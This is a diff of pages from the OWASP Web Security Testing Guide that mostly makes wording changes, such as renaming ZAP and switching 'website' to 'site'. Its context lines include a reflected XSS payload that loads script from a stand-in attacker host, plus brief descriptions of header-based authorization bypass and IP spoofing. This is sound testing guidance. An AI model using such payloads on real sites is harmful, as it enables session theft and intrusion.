Publish Latest 2023-11-24

latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage.md

@@ -88,7 +88,7 @@ Although most web servers manage search engine indexing via the `robots.txt` fil
 <META name="robots" content="none">
 ```
 
-The [Platform for Internet Content Selection (PICS)](https://www.w3.org/PICS/) and [Protocol for Web Description Resources (POWDER)](https://www.w3.org/2007/powder/) provide infrastructure for associating metadata with internet content.
+The [Platform for Internet Content Selection (PICS)](https://www.w3.org/PICS/) and [Protocol for Web Description Resources (POWDER)](https://www.w3.org/2007/powder/) provide infrastructure for associating metadata with Internet content.
 
 ### Identifying JavaScript Code and Gathering JavaScript Files
 
@@ -167,7 +167,7 @@ Consider a situation in which a redirect response is the result of an authentica
 - Browser "view source" function
 - Eyeballs
 - [Curl](https://curl.haxx.se/)
-- [Zaproxy](https://www.zaproxy.org)
+- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
 - [Burp Suite](https://portswigger.net/burp)
 - [Waybackurls](https://github.com/tomnomnom/waybackurls)
 - [Google Maps API Scanner](https://github.com/ozguralp/gmapsapiscanner/)

latest/4-Web_Application_Security_Testing/01-Information_Gathering/06-Identify_Application_Entry_Points.md

@@ -152,7 +152,7 @@ Having a variety of injection locations provides the attacker with chaining poss
 
 ## Tools
 
-- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org/)
+- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org/)
 - [Burp Suite](https://www.portswigger.net/burp/)
 - [Fiddler](https://www.telerik.com/fiddler)
 

latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/13-Test_for_Path_Confusion.md

@@ -56,7 +56,7 @@ If the path `https://example.com/dashboard/none.js` is also opened by the user i
 
 ## Tools
 
-- [OWASP Zed Attack Proxy](https://www.zaproxy.org)
+- [Zed Attack Proxy](https://www.zaproxy.org)
 - [Burp Suite](https://portswigger.net/burp)
 
 ## Remediation

latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.md

@@ -195,7 +195,7 @@ Ensure default system accounts and test accounts are deleted prior to releasing
 
 ## Tools
 
-- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
+- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
 - [curl](https://curl.haxx.se/)
 - [PERL](https://www.perl.org)
 

latest/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.md

@@ -21,7 +21,7 @@ While most applications require authentication to gain access to private informa
 
 In addition, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished either by modifying the given URL parameter, by manipulating the form, or by counterfeiting sessions.
 
-Problems related to the authentication schema can be found at different stages of the software development life cycle (SDLC), like the design, development, and deployment phases:
+Problems related to the authentication schema can be found at different stages of the software development lifecycle (SDLC), like the design, development, and deployment phases:
 
 - In the design phase errors can include a wrong definition of application sections to be protected, the choice of not applying strong encryption protocols for securing the transmission of credentials, and many more.
 - In the development phase errors can include the incorrect implementation of input validation functionality or not following the security best practices for the specific language.
@@ -103,7 +103,7 @@ The following figure shows that with a simple SQL injection attack, it is someti
 
 If an attacker has been able to retrieve the application source code by exploiting a previously discovered vulnerability (e.g., directory traversal), or from a web repository (Open Source Applications), it could be possible to perform refined attacks against the implementation of the authentication process.
 
-In the following example (PHPBB 2.0.12 - Authentication Bypass Vulnerability), at line 2 the `unserialize()` function parses a user supplied cookie and sets values inside the `$sessiondata` array. At line 7, the user's MD5 password hash stored inside the back end database (`$auto_login_key`) is compared to the one supplied (`$sessiondata['autologinid']`) by the user.
+In the following example (PHPBB 2.0.12 - Authentication Bypass Vulnerability), at line 2 the `unserialize()` function parses a user supplied cookie and sets values inside the `$sessiondata` array. At line 7, the user's MD5 password hash stored inside the backend database (`$auto_login_key`) is compared to the one supplied (`$sessiondata['autologinid']`) by the user.
 
 ```php
 1. if (isset($HTTP_COOKIE_VARS[$cookiename . '_sid'])) {
@@ -135,7 +135,7 @@ Let's disassemble what we did in this string:
 ## Tools
 
 - [WebGoat](https://owasp.org/www-project-webgoat/)
-- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
+- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
 
 ## References
 

latest/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.md

@@ -95,7 +95,7 @@ The methodology for testing is equivalent to the black-box case, as in both scen
 
 ## Tools
 
-- [OWASP Zed Attack Proxy](https://www.zaproxy.org)
+- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
 
 ## References
 

latest/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema.md

@@ -120,7 +120,7 @@ Some applications support non-standard headers such as `X-Original-URL` or `X-Re
 
 This behavior can be leveraged in a situation in which the application is behind a component that applies access control restriction based on the request URL.
 
-The kind of access control restriction based on the request URL can be, for example, blocking access from Internet to an administration console exposed on `/console` or `/admin`.
+The kind of access control restriction based on the request URL can be, for example, blocking access from internet to an administration console exposed on `/console` or `/admin`.
 
 To detect the support for the header `X-Original-URL` or `X-Rewrite-URL`, the following steps can be applied.
 
@@ -152,7 +152,7 @@ X-Rewrite-URL: /donotexist2
 
 If the response for either request contains markers that the resource was not found, this indicates that the application supports the special request headers. These markers may include the HTTP response status code 404, or a "resource not found" message in the response body.
 
-Once the support for the header `X-Original-URL` or `X-Rewrite-URL` was validated then the tentative of bypass against the access control restriction can be leveraged by sending the expected request to the application but specifying a URL "allowed" by the front-end component as the main request URL and specifying the real target URL in the `X-Original-URL` or `X-Rewrite-URL` header depending on the one supported. If both are supported then try one after the other to verify for which header the bypass is effective.
+Once the support for the header `X-Original-URL` or `X-Rewrite-URL` was validated then the tentative of bypass against the access control restriction can be leveraged by sending the expected request to the application but specifying a URL "allowed" by the frontend component as the main request URL and specifying the real target URL in the `X-Original-URL` or `X-Rewrite-URL` header depending on the one supported. If both are supported then try one after the other to verify for which header the bypass is effective.
 
 #### 4. Other Headers to Consider
 
@@ -183,7 +183,7 @@ Employ the least privilege principles on the users, roles, and resources to ensu
 
 ## Tools
 
-- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org/)
+- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org/)
     - [ZAP add-on: Access Control Testing](https://www.zaproxy.org/docs/desktop/addons/access-control-testing/)
 - [Port Swigger Burp Suite](https://portswigger.net/burp)
     - [Burp extension: AuthMatrix](https://github.com/SecurityInnovation/AuthMatrix/)

latest/4-Web_Application_Security_Testing/05-Authorization_Testing/03-Testing_for_Privilege_Escalation.md

@@ -93,15 +93,15 @@ In this condition, verify that it is not possible to escalate privileges by modi
 
 #### Manipulation of IP Address
 
-Some websites limit access or count the number of failed login attempts based on IP address.
+Some sites limit access or count the number of failed login attempts based on IP address.
 
 For example:
 
 ```text
 X-Forwarded-For: 8.1.1.1
 ```
 
-In this case, if the website uses the value of `X-forwarded-For` as client IP address, tester may change the IP value of the `X-forwarded-For` HTTP header to workaround the IP source identification.
+In this case, if the site uses the value of `X-forwarded-For` as client IP address, tester may change the IP value of the `X-forwarded-For` HTTP header to workaround the IP source identification.
 
 ### Testing for Vertical Bypassing Authorization Schema
 
@@ -175,7 +175,7 @@ The application will be considered vulnerable if any role other than administrat
 
 ### URL Traversal
 
-Try to traverse the website and check if some of pages that may miss the authorization check.
+Try to traverse the site and check if some of pages that may miss the authorization check.
 
 For example:
 
@@ -195,7 +195,7 @@ startswith(), endswith(), contains(), indexOf()
 
 ### Weak SessionID
 
-Weak Session ID has algorithm may be vulnerable to brute Force attack. For example, one website is using `MD5(Password + UserID)` as sessionID. Then, testers may guess or generate the sessionID for other users.
+Weak Session ID has algorithm may be vulnerable to brute Force attack. For example, one site is using `MD5(Password + UserID)` as sessionID. Then, testers may guess or generate the sessionID for other users.
 
 ## References
 
@@ -205,4 +205,4 @@ Weak Session ID has algorithm may be vulnerable to brute Force attack. For examp
 
 ## Tools
 
-- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
+- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)

latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/01-Testing_for_Session_Management_Schema.md

@@ -199,7 +199,7 @@ More information here: [Testing for cookies attributes](02-Testing_for_Cookies_A
 
 ## Tools
 
-- [OWASP Zed Attack Proxy Project (ZAP)](https://www.zaproxy.org) - features a session token analysis mechanism.
+- [Zed Attack Proxy Project (ZAP)](https://www.zaproxy.org) - features a session token analysis mechanism.
 - [Burp Sequencer](https://portswigger.net/burp/documentation/desktop/tools/sequencer)
 - [YEHG's JHijack](https://github.com/yehgdotnet/JHijack)
 

latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/02-Testing_for_Cookies_Attributes.md

@@ -89,7 +89,7 @@ The [`SameSite`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#SameS
 
 ##### Strict Value
 
-The `Strict` value is the most restrictive usage of `SameSite`, allowing the browser to send the cookie only to first-party context without top-level navigation. In other words, the data associated with the cookie will only be sent on requests matching the current site shown on the browser URL bar. The cookie will not be sent on requests generated by third-party websites. This value is especially recommended for actions performed at the same domain. However, it can have some limitations with some session management systems negatively affecting the user navigation experience. Since the browser would not send the cookie on any requests generated from a third-party domain or email, the user would be required to sign in again even if they already have an authenticated session.
+The `Strict` value is the most restrictive usage of `SameSite`, allowing the browser to send the cookie only to first-party context without top-level navigation. In other words, the data associated with the cookie will only be sent on requests matching the current site shown on the browser URL bar. The cookie will not be sent on requests generated by third-party sites. This value is especially recommended for actions performed at the same domain. However, it can have some limitations with some session management systems negatively affecting the user navigation experience. Since the browser would not send the cookie on any requests generated from a third-party domain or email, the user would be required to sign in again even if they already have an authenticated session.
 
 ##### Lax Value
 
@@ -136,7 +136,7 @@ Putting all this together, we can define the most secure cookie attribute config
 
 ### Intercepting Proxy
 
-- [OWASP Zed Attack Proxy Project](https://www.zaproxy.org)
+- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
 - [Web Proxy Burp Suite](https://portswigger.net)
 
 ### Browser Plug-in

latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md

@@ -174,7 +174,7 @@ Now suppose that developers of the target site implemented the following code to
 Decoupling the above regular expression:
 
 1. Check for a `<script`
-2. Check for a " " (white space)
+2. Check for a " " (whitespace)
 3. Any character but the character `>` for one or more occurrences
 4. Check for a `src`
 
@@ -184,7 +184,7 @@ This is useful for filtering expressions like `<script src="http://attacker/xss.
 http://example/?var=<SCRIPT%20a=">"%20SRC="http://attacker/xss.js"></SCRIPT>
 ```
 
-This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim web site, `http://example/`.
+This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim site, `http://example/`.
 
 #### Example 7: HTTP Parameter Pollution (HPP)
 
@@ -216,7 +216,7 @@ If source code is available (white-box testing), all variables received from use
 - [XSS-Proxy](http://xss-proxy.sourceforge.net/) is an advanced Cross-Site-Scripting (XSS) attack tool.
 - [ratproxy](https://code.google.com/archive/p/ratproxy/) is a semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.
 - [Burp Proxy](https://portswigger.net/burp/) is an interactive HTTP/S proxy server for attacking and testing web applications.
-- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org) is an interactive HTTP/S proxy server for attacking and testing web applications with a built-in scanner.
+- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org) is an interactive HTTP/S proxy server for attacking and testing web applications with a built-in scanner.
 
 ## References
 

latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md

@@ -17,7 +17,7 @@ tags: WSTG
 
 Stored [Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.
 
-Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.
+Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.
 
 This vulnerability can be used to conduct a number of browser-based attacks including:
 
@@ -52,7 +52,7 @@ The process for identifying stored XSS vulnerabilities is similar to the process
 
 #### Input Forms
 
-The first step is to identify all points where user input is stored into the back-end and then displayed by the application. Typical examples of stored user input can be found in:
+The first step is to identify all points where user input is stored into the backend and then displayed by the application. Typical examples of stored user input can be found in:
 
 - User/Profiles page: the application allows the user to edit/change profile details such as first name, last name, nickname, avatar, picture, address, etc.
 - Shopping cart: the application allows the user to store items into the shopping cart which can then be reviewed later
@@ -168,12 +168,12 @@ Blind Cross-site Scripting is a form of stored XSS. It generally occurs when the
 
 Gray-box testing is similar to black-box testing. In gray-box testing, the pen-tester has partial knowledge of the application. In this case, information regarding user input, input validation controls, and data storage might be known by the pen-tester.
 
-Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the back-end system. The following steps are recommended:
+Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the backend system. The following steps are recommended:
 
-- Use front-end application and enter input with special/invalid characters
+- Use frontend application and enter input with special/invalid characters
 - Analyze application response(s)
 - Identify presence of input validation controls
-- Access back-end system and check if input is stored and how it is stored
+- Access backend system and check if input is stored and how it is stored
 - Analyze source code and understand how stored input is rendered by the application
 
 If source code is available (as in white-box testing), all variables used in input forms should be analyzed. In particular, programming languages such as PHP, ASP, and JSP make use of predefined variables/functions to store input from HTTP GET and POST requests.
@@ -197,7 +197,7 @@ The following table summarizes some special variables and functions to look at w
 - [XSS-Proxy](http://xss-proxy.sourceforge.net/) is an advanced Cross-Site-Scripting (XSS) attack tool.
 - [Burp Proxy](https://portswigger.net/burp/) is an interactive HTTP/S proxy server for attacking and testing web applications.
 - [XSS Assistant](https://www.greasespot.net/) Greasemonkey script that allow users to easily test any web application for cross-site-scripting flaws.
-- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org) is an interactive HTTP/S proxy server for attacking and testing web applications with a built-in scanner.
+- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org) is an interactive HTTP/S proxy server for attacking and testing web applications with a built-in scanner.
 - [XSS Hunter Portable](https://github.com/mandatoryprogrammer/xsshunter) XSS Hunter finds all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS.
 
 ## References